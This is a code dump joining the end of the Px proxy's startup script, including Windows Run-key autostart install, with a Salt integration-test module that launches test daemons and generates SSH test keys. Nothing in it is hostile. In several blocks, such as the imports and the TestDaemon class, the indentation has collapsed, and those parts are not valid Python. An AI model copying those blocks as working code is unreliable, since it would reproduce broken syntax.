            sys.stdout.write("Quitting Px ..")
            # Give processes time to react to CTRL_C before escalating
            time.sleep(4)
        sys.stdout.flush()
        quit(True)
    else:
        if force:
            pprint(" DONE")
        else:
            pprint("Px is not running")

    sys.exit()
def handle_exceptions(extype, value, tb):
    """sys.excepthook replacement: format the traceback, show it via the
    logger (or stderr), and persist it to the debug log file.

    Args mirror sys.excepthook: exception type, exception value, traceback.
    """
    # Create traceback log
    lst = traceback.format_tb(tb, None) + traceback.format_exception_only(extype, value)
    tracelog = '\nTraceback (most recent call last):\n' + "%-20s%s\n" % ("".join(lst[:-1]), lst[-1])

    if State.logger != None:
        pprint(tracelog)
    else:
        sys.stderr.write(tracelog)

    # Save to debug.log; the context manager guarantees the handle is closed
    # even if the write itself fails (the original leaked it in that case)
    with open(dfile(), 'w') as dbg:
        dbg.write(tracelog)
###
# Install Px to startup
def get_script_path():
    """Return the absolute path of the running script, or the executable
    itself when running as a frozen (PyInstaller-style) binary."""
    frozen = getattr(sys, "frozen", False)
    if frozen is not False:
        # Frozen mode
        return sys.executable
    # Script mode: resolve argv[0] against the current working directory
    return os.path.normpath(os.path.join(os.getcwd(), sys.argv[0]))
def get_script_cmd():
    """Return the command line that relaunches Px: the interpreter plus the
    quoted script for .py files, or the frozen executable path itself."""
    path = get_script_path()
    extension = os.path.splitext(path)[1].lower()
    if extension == ".py":
        return sys.executable + ' "%s"' % path
    return path
def check_installed():
    """Return True if a 'Px' autorun value exists under HKCU\\...\\Run."""
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_READ)
    try:
        winreg.QueryValueEx(key, "Px")
        found = True
    except:
        # Value missing => not installed
        found = False
    winreg.CloseKey(key)
    return found
def install():
    """Register Px in the user's Run key so it starts at login, then exit."""
    if not check_installed():
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
        # REG_EXPAND_SZ so environment variables in the command line expand
        winreg.SetValueEx(key, "Px", 0, winreg.REG_EXPAND_SZ, get_script_cmd())
        winreg.CloseKey(key)
        pprint("Px installed successfully")
    else:
        pprint("Px already installed")

    sys.exit()
def uninstall():
    """Remove Px from the user's Run key if present, then exit."""
    if check_installed():
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", 0, winreg.KEY_WRITE)
        winreg.DeleteValue(key, "Px")
        winreg.CloseKey(key)
        pprint("Px uninstalled successfully")
    else:
        pprint("Px is not installed")

    sys.exit()
###
# Attach/detach console
def attach_console():
    # Attach this (GUI-mode) process to its parent's console window so
    # debug output is visible. Walks up the process tree to find a
    # cmd.exe/powershell ancestor, then calls AttachConsole on it.
    if ctypes.windll.kernel32.GetConsoleWindow() != 0:
        dprint("Already attached to a console")
        return

    # Find parent cmd.exe if exists
    pid = os.getpid()
    while True:
        try:
            p = psutil.Process(pid)
        except psutil.NoSuchProcess:
            # No such parent - started without console
            pid = -1
            break

        if os.path.basename(p.name()).lower() in ["cmd", "cmd.exe", "powershell", "powershell.exe"]:
            # Found it
            break

        # Search parent
        pid = p.ppid()

    # Not found, started without console
    if pid == -1:
        dprint("No parent console to attach to")
        return

    dprint("Attaching to console " + str(pid))
    if ctypes.windll.kernel32.AttachConsole(pid) == 0:
        dprint("Attach failed with error " + str(ctypes.windll.kernel32.GetLastError()))
        return

    if ctypes.windll.kernel32.GetConsoleWindow() == 0:
        dprint("Not a console window")
        return

    # Re-wire sys.stdout to the newly attached console
    reopen_stdout()
def detach_console():
    """Detach from the console attached by attach_console(), restoring stdout first."""
    if ctypes.windll.kernel32.GetConsoleWindow() == 0:
        # Not attached to any console - nothing to do
        return

    restore_stdout()

    if ctypes.windll.kernel32.FreeConsole():
        dprint("Freed console successfully")
    else:
        dprint("Free console failed with error " + str(ctypes.windll.kernel32.GetLastError()))
###
# Startup
def main():
    # Px entry point. Order matters: freeze_support() must run before any
    # multiprocessing use in frozen Windows builds, and the excepthook must
    # be installed before parse_config() so startup errors are captured.
    multiprocessing.freeze_support()
    sys.excepthook = handle_exceptions

    parse_config()
    run_pool()
# Script entry point
if __name__ == "__main__":
    main()
|
__init__.py | # -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import platform
import os
import re
import sys
import copy
import json
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from hashlib import md5
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Matches the "function already running" error emitted by the state system,
# capturing the function name, PID, start date and jid
STATE_FUNCTION_RUNNING_RE = re.compile(
    r'''The function (?:"|')(?P<state_func>.*)(?:"|') is running as PID '''
    r'(?P<pid>[\d]+) and was started at (?P<date>.*) with jid (?P<jid>[\d]+)'
)

# Directory containing this integration test package
INTEGRATION_TEST_DIR = os.path.dirname(
    os.path.normpath(os.path.abspath(__file__))
)
# Repository root (two levels up from tests/integration)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.case import ShellTestCase
from salttesting.mixins import CheckShellBinaryNameAndVersionMixIn
from salttesting.parser import PNUM, print_header, SaltTestcaseParser
from salttesting.helpers import requires_sshd_server
from salttesting.helpers import ensure_in_syspath, RedirectStdStreams
# Update sys.path
ensure_in_syspath(CODE_DIR)
# Import Salt libs
import salt
import salt.config
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils
import salt.utils.process
import salt.log.setup as salt_log_setup
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.utils.process import MultiprocessingProcess, SignalHandlingMultiprocessingProcess
from salt.utils.nb_popen import NonBlockingPopen
from salt.exceptions import SaltClientError
try:
import salt.master
except ImportError:
# Not required for raet tests
pass
# Import 3rd-party libs
import yaml
import msgpack
import salt.ext.six as six
import salt.ext.six.moves.socketserver as socketserver # pylint: disable=no-name-in-module
if salt.utils.is_windows():
import win32api
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
from tornado import gen
from tornado import ioloop
from tornado import concurrent
SYS_TMP_DIR = os.path.realpath(
    # Avoid ${TMPDIR} and gettempdir() on MacOS as they yield a base path too long
    # for unix sockets: ``error: AF_UNIX path too long``
    # Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
    os.environ.get('TMPDIR', tempfile.gettempdir()) if not salt.utils.is_darwin() else '/tmp'
)

# Scratch tree for everything the test run creates
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
# e.g. 'python2.7' / 'python3.6' for the running interpreter
PYEXEC = 'python{0}.{1}'.format(*sys.version_info)
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
TMP_PRODENV_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-prodenv-state-tree')
# Per-daemon configuration directories written by transplant_configs()
TMP_CONF_DIR = os.path.join(TMP, 'config')
TMP_SUB_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, 'sub-minion')
TMP_SYNDIC_MINION_CONF_DIR = os.path.join(TMP_CONF_DIR, 'syndic-minion')
TMP_SYNDIC_MASTER_CONF_DIR = os.path.join(TMP_CONF_DIR, 'syndic-master')
CONF_DIR = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
PILLAR_DIR = os.path.join(FILES, 'pillar')
TMP_SCRIPT_DIR = os.path.join(TMP, 'scripts')
ENGINES_DIR = os.path.join(FILES, 'engines')
LOG_HANDLERS_DIR = os.path.join(FILES, 'log_handlers')
SCRIPT_TEMPLATES = {
'salt': [
'from salt.scripts import salt_main\n',
'if __name__ == \'__main__\':\n'
' salt_main()'
],
'salt-api': [
'import salt.cli\n',
'def main():\n',
' sapi = salt.cli.SaltAPI()',
' sapi.run()\n',
'if __name__ == \'__main__\':',
' main()'
],
'common': [
'from salt.scripts import salt_{0}\n',
'from salt.utils import is_windows\n\n',
'if __name__ == \'__main__\':\n',
' if is_windows():\n',
' import os.path\n',
' import py_compile\n',
' cfile = os.path.splitext(__file__)[0] + ".pyc"\n',
' if not os.path.exists(cfile):\n',
' py_compile.compile(__file__, cfile)\n',
' salt_{0}()'
]
}
RUNTIME_CONFIGS = {}
log = logging.getLogger(__name__)
def cleanup_runtime_config_instance(to_cleanup):
    """Explicitly empty *to_cleanup*, dropping every cached config instance."""
    while to_cleanup:
        _, instance = to_cleanup.popitem()
        del instance
# Drop cached configs even if the test run exits abnormally
atexit.register(cleanup_runtime_config_instance, RUNTIME_CONFIGS)

# Sockets handed out by get_unused_localhost_port(), kept open (and the
# port thereby reserved) until process exit
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
    '''
    Return a random unused port on localhost
    '''
    usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
    usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    usock.bind(('127.0.0.1', 0))
    port = usock.getsockname()[1]
    if port in (54505, 54506, 64505, 64506, 64510, 64511):
        # These ports are hardcoded in the test configuration - discard
        # this socket and try again
        usock.close()
        return get_unused_localhost_port()
    # Hold the socket open so nothing else grabs the port before the tests do
    _RUNTESTS_PORTS[port] = usock
    return port
def close_open_sockets(sockets_dict):
    """Close every socket registered in *sockets_dict* and empty the dict."""
    while sockets_dict:
        _, sock = sockets_dict.popitem()
        sock.close()
# Release all reserved ports at interpreter exit
atexit.register(close_open_sockets, _RUNTESTS_PORTS)

# Port the multiprocessing log-forwarding server listens on
SALT_LOG_PORT = get_unused_localhost_port()
def run_tests(*test_cases, **kwargs):
    '''
    Run integration tests for the chosen test cases.

    Accepts only the ``needs_daemon`` keyword argument (default True); when
    set, a full master/minion/syndic daemon environment is started around
    each test case. Function uses optparse to set up test environment.
    '''
    needs_daemon = kwargs.pop('needs_daemon', True)
    if kwargs:
        raise RuntimeError(
            'The \'run_tests\' function only accepts \'needs_daemon\' as a '
            'keyword argument'
        )

    class TestcaseParser(SaltTestcaseParser):
        def setup_additional_options(self):
            self.add_option(
                '--sysinfo',
                default=False,
                action='store_true',
                help='Print some system information.'
            )
            self.output_options_group.add_option(
                '--no-colors',
                '--no-colours',
                default=False,
                action='store_true',
                help='Disable colour printing.'
            )
            if needs_daemon:
                self.add_option(
                    '--transport',
                    default='zeromq',
                    choices=('zeromq', 'raet', 'tcp'),
                    help=('Select which transport to run the integration tests with, '
                          'zeromq, raet, or tcp. Default: %default')
                )

        def validate_options(self):
            SaltTestcaseParser.validate_options(self)
            # Transplant configuration for the selected transport into TMP_CONF_DIR
            transport = None
            if needs_daemon:
                transport = self.options.transport
            TestDaemon.transplant_configs(transport=transport)

        def run_testcase(self, testcase, needs_daemon=True):  # pylint: disable=W0221
            if needs_daemon:
                print(' * Setting up Salt daemons to execute tests')
                # TestDaemon context starts/stops the full daemon environment
                with TestDaemon(self):
                    return SaltTestcaseParser.run_testcase(self, testcase)
            return SaltTestcaseParser.run_testcase(self, testcase)

    parser = TestcaseParser()
    parser.parse_args()
    for case in test_cases:
        # finalize(1) exits non-zero on the first failing case
        if parser.run_testcase(case, needs_daemon=needs_daemon) is False:
            parser.finalize(1)
    parser.finalize(0)
class ThreadingMixIn(socketserver.ThreadingMixIn):
    # Handler threads are daemonized so they never block interpreter shutdown
    daemon_threads = True
class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer):
    '''
    TCP server that handles each connection in a daemon thread and exposes
    a ``shutting_down`` event so request handlers can exit cleanly.
    '''

    allow_reuse_address = True

    def server_activate(self):
        # Created here (not __init__) so it exists exactly while serving
        self.shutting_down = threading.Event()
        socketserver.TCPServer.server_activate(self)

    def server_close(self):
        if hasattr(self, 'shutting_down'):
            # Tell in-flight handlers to stop before the socket goes away
            self.shutting_down.set()
        socketserver.TCPServer.server_close(self)
class SocketServerRequestHandler(socketserver.StreamRequestHandler):
    # Receives msgpack-encoded logging records from the test daemons and
    # replays them through this process's logging tree.

    def handle(self):
        # NOTE(review): msgpack's encoding= kwarg is deprecated in newer
        # msgpack releases - confirm the pinned msgpack version supports it
        unpacker = msgpack.Unpacker(encoding='utf-8')
        while not self.server.shutting_down.is_set():
            try:
                wire_bytes = self.request.recv(1024)
                if not wire_bytes:
                    # Peer closed the connection
                    break
                unpacker.feed(wire_bytes)
                # The unpacker yields one dict per complete record received
                for record_dict in unpacker:
                    record = logging.makeLogRecord(record_dict)
                    logger = logging.getLogger(record.name)
                    logger.handle(record)
            except (EOFError, KeyboardInterrupt, SystemExit):
                break
            except socket.error as exc:
                try:
                    if exc.errno == errno.WSAECONNRESET:
                        # Connection reset on windows
                        break
                except AttributeError:
                    # We're not on windows
                    pass
                log.exception(exc)
            except Exception as exc:
                log.exception(exc)
class ScriptPathMixin(object):
    # Generates thin wrapper scripts under TMP_SCRIPT_DIR that invoke the
    # salt CLI entry points with CODE_DIR on sys.path.

    def get_script_path(self, script_name):
        '''
        Return the path to a testing runtime script, generating it on first use.
        Raises RuntimeError when no template matches *script_name*.
        '''
        if not os.path.isdir(TMP_SCRIPT_DIR):
            os.makedirs(TMP_SCRIPT_DIR)

        script_path = os.path.join(TMP_SCRIPT_DIR,
                                   'cli_{0}.py'.format(script_name.replace('-', '_')))

        if not os.path.isfile(script_path):
            log.info('Generating {0}'.format(script_path))

            # Late import
            import salt.utils

            with salt.utils.fopen(script_path, 'w') as sfh:
                script_template = SCRIPT_TEMPLATES.get(script_name, None)
                if script_template is None:
                    # Fall back to the generic salt_<name>() template
                    script_template = SCRIPT_TEMPLATES.get('common', None)
                if script_template is None:
                    raise RuntimeError(
                        '{0} does not know how to handle the {1} script'.format(
                            self.__class__.__name__,
                            script_name
                        )
                    )
                # NOTE(review): indentation inside the generated source was
                # restored from convention (the dump collapsed whitespace)
                sfh.write(
                    '#!{0}\n\n'.format(sys.executable) +
                    'import sys\n' +
                    'CODE_DIR="{0}"\n'.format(CODE_DIR) +
                    'if CODE_DIR not in sys.path:\n' +
                    '    sys.path.insert(0, CODE_DIR)\n\n' +
                    '\n'.join(script_template).format(script_name.replace('salt-', ''))
                )
            # Mark the generated script executable
            fst = os.stat(script_path)
            os.chmod(script_path, fst.st_mode | stat.S_IEXEC)

        log.info('Returning script path %r', script_path)
        return script_path
class SaltScriptBase(ScriptPathMixin):
    '''
    Base class for Salt CLI scripts
    '''

    # Subclasses set this to the CLI entry point name (e.g. 'salt-minion')
    cli_script_name = None

    def __init__(self,
                 config,
                 config_dir,
                 bin_dir_path,
                 io_loop=None):
        self.config = config
        self.config_dir = config_dir
        self.bin_dir_path = bin_dir_path
        self._io_loop = io_loop

    @property
    def io_loop(self):
        '''
        Return the IOLoop, lazily binding to the current loop on first access.
        '''
        if self._io_loop is not None:
            return self._io_loop
        self._io_loop = ioloop.IOLoop.current()
        return self._io_loop

    def get_script_args(self):  # pylint: disable=no-self-use
        '''
        Returns any additional arguments to pass to the CLI script
        '''
        return []
class SaltDaemonScriptBase(SaltScriptBase, ShellTestCase):
    '''
    Base class for Salt Daemon CLI scripts: spawns the daemon in a child
    process, escalates SIGINT -> SIGTERM -> SIGKILL on shutdown, and can
    wait until the daemon's ports become connectable.
    '''

    def __init__(self, *args, **kwargs):
        super(SaltDaemonScriptBase, self).__init__(*args, **kwargs)
        # Cross-process flags: daemon should keep running / daemon is reachable
        self._running = multiprocessing.Event()
        self._connectable = multiprocessing.Event()
        self._process = None

    def is_alive(self):
        '''
        Returns true if the process is alive
        '''
        return self._running.is_set()

    def get_check_ports(self):  # pylint: disable=no-self-use
        '''
        Return a list of ports to check against to ensure the daemon is running
        '''
        return []

    def start(self):
        '''
        Start the daemon subprocess
        '''
        self._process = SignalHandlingMultiprocessingProcess(
            target=self._start, args=(self._running,))
        self._process.start()
        self._running.set()
        return True

    def _start(self, running_event):
        '''
        The actual, coroutine aware, start method. Runs in the child process:
        launches the CLI script, drains its output while *running_event* is
        set, then walks the daemon through a graceful shutdown.
        '''
        log.info('Starting %s %s DAEMON', self.display_name, self.__class__.__name__)
        proc_args = [
            self.get_script_path(self.cli_script_name),
            '-c',
            self.config_dir,
        ] + self.get_script_args()
        if salt.utils.is_windows():
            # Windows need the python executable to come first
            proc_args.insert(0, sys.executable)
        log.info('Running \'%s\' from %s...', ' '.join(proc_args), self.__class__.__name__)

        try:
            terminal = NonBlockingPopen(proc_args, cwd=CODE_DIR)

            while running_event.is_set() and terminal.poll() is None:
                # We're not actually interested in processing the output, just consume it
                if terminal.stdout is not None:
                    terminal.recv()
                if terminal.stderr is not None:
                    terminal.recv_err()
                time.sleep(0.125)
        except (SystemExit, KeyboardInterrupt):
            pass

        # Let's begin the shutdown routines: SIGINT first, ~15s grace period
        if terminal.poll() is None:
            try:
                log.info('Sending SIGINT to %s %s DAEMON', self.display_name, self.__class__.__name__)
                terminal.send_signal(signal.SIGINT)
            except OSError as exc:
                # ESRCH/EACCES: process already gone or not ours - ignore
                if exc.errno not in (errno.ESRCH, errno.EACCES):
                    raise
            timeout = 15
            log.info('Waiting %s seconds for %s %s DAEMON to respond to SIGINT',
                     timeout,
                     self.display_name,
                     self.__class__.__name__)
            while timeout > 0:
                if terminal.poll() is not None:
                    break
                timeout -= 0.0125
                time.sleep(0.0125)
        # Still alive? Escalate to SIGTERM with another grace period
        if terminal.poll() is None:
            try:
                log.info('Sending SIGTERM to %s %s DAEMON', self.display_name, self.__class__.__name__)
                terminal.send_signal(signal.SIGTERM)
            except OSError as exc:
                if exc.errno not in (errno.ESRCH, errno.EACCES):
                    raise
            timeout = 15
            log.info('Waiting %s seconds for %s %s DAEMON to respond to SIGTERM',
                     timeout,
                     self.display_name,
                     self.__class__.__name__)
            while timeout > 0:
                if terminal.poll() is not None:
                    break
                timeout -= 0.0125
                time.sleep(0.0125)
        # Last resort: SIGKILL
        if terminal.poll() is None:
            try:
                log.info('Sending SIGKILL to %s %s DAEMON', self.display_name, self.__class__.__name__)
                terminal.kill()
            except OSError as exc:
                if exc.errno not in (errno.ESRCH, errno.EACCES):
                    raise
        # Let's close the terminal now that we're done with it
        try:
            terminal.terminate()
        except OSError as exc:
            if exc.errno not in (errno.ESRCH, errno.EACCES):
                raise
        terminal.communicate()

    def terminate(self):
        '''
        Terminate the started daemon, reaping any child processes it left behind.
        '''
        log.info('Terminating %s %s DAEMON', self.display_name, self.__class__.__name__)
        if HAS_PSUTIL:
            # Snapshot the children before terminating the parent
            try:
                parent = psutil.Process(self._process.pid)
                children = parent.children(recursive=True)
            except psutil.NoSuchProcess:
                children = []
        self._running.clear()
        self._connectable.clear()
        time.sleep(0.0125)
        self._process.terminate()
        if HAS_PSUTIL:
            # Lets log and kill any child processes which salt left behind
            for child in children[:]:
                try:
                    child.send_signal(signal.SIGKILL)
                    log.info('Salt left behind the following child process: %s', child.as_dict())
                    try:
                        child.wait(timeout=5)
                    except psutil.TimeoutExpired:
                        child.kill()
                except psutil.NoSuchProcess:
                    children.remove(child)
            if children:
                psutil.wait_procs(children, timeout=5)
        log.info('%s %s DAEMON terminated', self.display_name, self.__class__.__name__)

    def wait_until_running(self, timeout=None):
        '''
        Blocking call to wait for the daemon to start listening
        '''
        if self._connectable.is_set():
            return True
        try:
            return self.io_loop.run_sync(self._wait_until_running, timeout=timeout)
        except ioloop.TimeoutError:
            return False

    @gen.coroutine
    def _wait_until_running(self):
        '''
        The actual, coroutine aware, call to wait for the daemon to start
        listening. Integer ports are probed with connect_ex(); string entries
        are treated as minion ids checked against ``manage.joined``.
        '''
        check_ports = self.get_check_ports()
        log.debug(
            '%s is checking the following ports to assure running status: %s',
            self.__class__.__name__,
            check_ports
        )
        while self._running.is_set():
            if not check_ports:
                # Everything answered - flag the daemon as connectable
                self._connectable.set()
                break
            for port in set(check_ports):
                if isinstance(port, int):
                    log.trace('Checking connectable status on port: %s', port)
                    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    conn = sock.connect_ex(('localhost', port))
                    if conn == 0:
                        log.debug('Port %s is connectable!', port)
                        check_ports.remove(port)
                        sock.shutdown(socket.SHUT_RDWR)
                        sock.close()
                    del sock
                elif isinstance(port, str):
                    # Minion id - ask the master which minions have joined
                    joined = self.run_run('manage.joined', config_dir=self.config_dir)
                    joined = [x.lstrip('- ') for x in joined]
                    if port in joined:
                        check_ports.remove(port)
            yield gen.sleep(0.125)
        # A final sleep to allow the ioloop to do other things
        yield gen.sleep(0.125)
        log.info('All ports checked. %s running!', self.cli_script_name)
        raise gen.Return(self._connectable.is_set())
class SaltMinion(SaltDaemonScriptBase):
    '''
    Class which runs the salt-minion daemon
    '''

    cli_script_name = 'salt-minion'

    def get_script_args(self):
        '''Run quietly; keepalive is only disabled off-Windows.'''
        args = ['-l', 'quiet']
        if not salt.utils.is_windows():
            args.append('--disable-keepalive')
        return args

    def get_check_ports(self):
        '''The minion counts as up once its id appears in manage.joined.'''
        return set([self.config['id']])
class SaltMaster(SaltDaemonScriptBase):
    '''
    Class which runs the salt-master daemon
    '''

    cli_script_name = 'salt-master'

    def get_check_ports(self):
        '''Ports that must accept connections before the master counts as up.'''
        return set([self.config['ret_port'],
                    self.config['publish_port'],
                    self.config['runtests_conn_check_port']])

    def get_script_args(self):
        '''Keep the daemon quiet during test runs.'''
        return ['-l', 'quiet']
class SaltSyndic(SaltDaemonScriptBase):
    '''
    Class which runs the salt-syndic daemon
    '''

    cli_script_name = 'salt-syndic'

    def get_script_args(self):
        '''Keep the daemon quiet during test runs.'''
        return ['-l', 'quiet']

    def get_check_ports(self):
        '''The syndic exposes no ports of its own to probe.'''
        return set()
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = get_colors(self.parser.options.no_colors is False)
if salt.utils.is_windows():
# There's no shell color support on windows...
for key in self.colors:
self.colors[key] = ''
    def __enter__(self):
        '''
        Start a master and minion
        '''
        # Setup the multiprocessing logging queue listener
        salt_log_setup.setup_multiprocessing_logging_listener(
            self.master_opts
        )

        # Set up PATH to mockbin
        self._enter_mockbin()

        # Start the daemons matching the selected transport
        if self.parser.options.transport == 'zeromq':
            self.start_zeromq_daemons()
        elif self.parser.options.transport == 'raet':
            self.start_raet_daemons()
        elif self.parser.options.transport == 'tcp':
            self.start_tcp_daemons()

        self.minion_targets = set(['minion', 'sub_minion'])
        self.pre_setup_minions()
        self.setup_minions()

        if getattr(self.parser.options, 'ssh', False):
            self.prep_ssh()

        # Optional --sysinfo report: versions plus minion grains
        if self.parser.options.sysinfo:
            try:
                print_header(
                    '~~~~~~~ Versions Report ', inline=True,
                    width=getattr(self.parser.options, 'output_columns', PNUM)
                )
            except TypeError:
                # Older salttesting print_header without the width kwarg
                print_header('~~~~~~~ Versions Report ', inline=True)
            print('\n'.join(salt.version.versions_report()))

            try:
                print_header(
                    '~~~~~~~ Minion Grains Information ', inline=True,
                    width=getattr(self.parser.options, 'output_columns', PNUM)
                )
            except TypeError:
                print_header('~~~~~~~ Minion Grains Information ', inline=True)

            grains = self.client.cmd('minion', 'grains.items')

            minion_opts = self.minion_opts.copy()
            minion_opts['color'] = self.parser.options.no_colors is False
            salt.output.display_output(grains, 'grains', minion_opts)

        try:
            print_header(
                '=', sep='=', inline=True,
                width=getattr(self.parser.options, 'output_columns', PNUM)
            )
        except TypeError:
            print_header('', sep='=', inline=True)

        # post_setup_minions() must run even if nothing above raised
        try:
            return self
        finally:
            self.post_setup_minions()
def start_daemon(self, cls, opts, start_fun):
def start(cls, opts, start_fun):
salt.utils.appendproctitle('{0}-{1}'.format(self.__class__.__name__, cls.__name__))
daemon = cls(opts)
getattr(daemon, start_fun)()
process = multiprocessing.Process(target=start,
args=(cls, opts, start_fun))
process.start()
return process
    def start_zeromq_daemons(self):
        '''
        Fire up the daemons used for zeromq tests: the log-forwarding server,
        two masters, two minions and a syndic, waiting for each to come up.
        '''
        # Log server collects records forwarded by the daemon processes
        self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
        self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
        self.log_server_process.daemon = True
        self.log_server_process.start()

        self.master_process = SaltMaster(self.master_opts, TMP_CONF_DIR, SCRIPT_DIR)
        self.master_process.display_name = 'salt-master'
        self.minion_process = SaltMinion(self.minion_opts, TMP_CONF_DIR, SCRIPT_DIR)
        self.minion_process.display_name = 'salt-minion'
        self.sub_minion_process = SaltMinion(self.sub_minion_opts, TMP_SUB_MINION_CONF_DIR, SCRIPT_DIR)
        self.sub_minion_process.display_name = 'sub salt-minion'
        self.smaster_process = SaltMaster(self.syndic_master_opts, TMP_SYNDIC_MASTER_CONF_DIR, SCRIPT_DIR)
        self.smaster_process.display_name = 'syndic salt-master'
        self.syndic_process = SaltSyndic(self.syndic_opts, TMP_SYNDIC_MINION_CONF_DIR, SCRIPT_DIR)
        self.syndic_process.display_name = 'salt-syndic'
        # Start each daemon in order and block until its check ports answer
        for process in (self.master_process, self.minion_process, self.sub_minion_process,
                        self.smaster_process, self.syndic_process):
            sys.stdout.write(
                ' * {LIGHT_YELLOW}Starting {0} ... {ENDC}'.format(
                    process.display_name,
                    **self.colors
                )
            )
            sys.stdout.flush()
            process.start()
            process.wait_until_running(timeout=15)
            # Overwrite the "Starting ..." line with the STARTED message
            sys.stdout.write(
                '\r{0}\r'.format(
                    ' ' * getattr(self.parser.options, 'output_columns', PNUM)
                )
            )
            sys.stdout.write(
                ' * {LIGHT_GREEN}Starting {0} ... STARTED!\n{ENDC}'.format(
                    process.display_name,
                    **self.colors
                )
            )
            sys.stdout.flush()
    def start_raet_daemons(self):
        '''
        Fire up the raet daemons! One ioflo master and two ioflo minions;
        raet has no syndic support.
        '''
        import salt.daemons.flo
        self.master_process = self.start_daemon(salt.daemons.flo.IofloMaster,
                                                self.master_opts,
                                                'start')

        self.minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
                                                self.minion_opts,
                                                'tune_in')

        self.sub_minion_process = self.start_daemon(salt.daemons.flo.IofloMinion,
                                                    self.sub_minion_opts,
                                                    'tune_in')
        # Wait for the daemons to all spin up
        time.sleep(5)

        # self.smaster_process = self.start_daemon(salt.daemons.flo.IofloMaster,
        #                                         self.syndic_master_opts,
        #                                         'start')

        # no raet syndic daemon yet
start_tcp_daemons = start_zeromq_daemons
    def prep_ssh(self):
        '''
        Generate keys and start an ssh daemon on an alternate port.

        Creates a client keypair plus dsa/ecdsa/ed25519 host keys under
        TMP_CONF_DIR, writes an sshd_config and roster, then launches sshd.
        Sets SSH_DAEMON_RUNNING in the environment on success.
        '''
        print(' * Initializing SSH subsystem')
        keygen = salt.utils.which('ssh-keygen')
        sshd = salt.utils.which('sshd')

        if not (keygen and sshd):
            print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
            return
        if not os.path.exists(TMP_CONF_DIR):
            os.makedirs(TMP_CONF_DIR)

        # Generate client key
        pub_key_test_file = os.path.join(TMP_CONF_DIR, 'key_test.pub')
        priv_key_test_file = os.path.join(TMP_CONF_DIR, 'key_test')
        if os.path.exists(pub_key_test_file):
            os.remove(pub_key_test_file)
        if os.path.exists(priv_key_test_file):
            os.remove(priv_key_test_file)
        keygen_process = subprocess.Popen(
            [keygen, '-t',
             'ecdsa',
             '-b',
             '521',
             '-C',
             '"$(whoami)@$(hostname)-$(date -I)"',
             '-f',
             'key_test',
             '-P',
             ''],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=TMP_CONF_DIR
        )
        _, keygen_err = keygen_process.communicate()
        if keygen_err:
            print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_err)))
        sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
        shutil.copy(sshd_config_path, TMP_CONF_DIR)
        auth_key_file = os.path.join(TMP_CONF_DIR, 'key_test.pub')

        # Generate server key
        server_key_dir = os.path.join(TMP_CONF_DIR, 'server')
        if not os.path.exists(server_key_dir):
            os.makedirs(server_key_dir)
        server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
        server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
        server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
        server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
        server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
        # NOTE(review): 'ssh_host.ed25519_key.pub' (dot, not underscore) looks
        # like a typo carried in the original source - kept as-is
        server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host.ed25519_key.pub')

        # Remove stale host keys from previous runs
        for server_key_file in (server_dsa_priv_key_file,
                                server_dsa_pub_key_file,
                                server_ecdsa_priv_key_file,
                                server_ecdsa_pub_key_file,
                                server_ed25519_priv_key_file,
                                server_ed25519_pub_key_file):
            if os.path.exists(server_key_file):
                os.remove(server_key_file)

        keygen_process_dsa = subprocess.Popen(
            [keygen, '-t',
             'dsa',
             '-b',
             '1024',
             '-C',
             '"$(whoami)@$(hostname)-$(date -I)"',
             '-f',
             'ssh_host_dsa_key',
             '-P',
             ''],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=server_key_dir
        )
        _, keygen_dsa_err = keygen_process_dsa.communicate()
